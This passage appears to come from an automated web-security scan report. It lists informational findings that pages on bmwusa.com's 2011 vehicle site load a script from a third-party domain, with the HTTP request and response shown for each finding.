Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:03:25 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:23:25 GMT;path=/
Content-Length: 226005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.283. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:01:58 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:21:58 GMT;path=/
Content-Length: 215485


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.284. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/xdrive35i/x6seriessacmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:02:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:22:32 GMT;path=/
Content-Length: 202207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.285. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive50i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:03:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:23:56 GMT;path=/
Content-Length: 212730


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.286. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/features_and_specs/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:05:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:25:38 GMT;path=/
Content-Length: 226194


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.287. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:04:04 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:24:04 GMT;path=/
Content-Length: 215296


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.288. http://www.bmwusa.com/standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/x6/xdrive50i/x6seriessacmediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:04:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:24:20 GMT;path=/
Content-Length: 202210


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.289. http://www.bmwusa.com/standard/content/vehicles/2011/z4/default.aspx%20

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/default.aspx%20

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/z4/default.aspx%20 HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:05:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:25:57 GMT;path=/
Content-Length: 240756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.290. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4explore.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4explore.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/z4/z4explore.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:06:40 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:26:40 GMT;path=/
Content-Length: 180450


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.291. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:14 GMT;path=/
Content-Length: 213969


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.292. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:38 GMT;path=/
Content-Length: 215060


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.293. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/z4/z4sdrive30i/z4seriesroadstermediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:07:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:27:57 GMT;path=/
Content-Length: 202214


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.294. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:19 GMT;path=/
Content-Length: 213976


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.295. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/modelhighlights/default.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:54 GMT;path=/
Content-Length: 215086


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</iframe><script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.296. http://www.bmwusa.com/standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bmwusa.com
Path:   /standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /standard/content/vehicles/2011/z4/z4sdrive35i/z4seriesroadstermediagallery.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
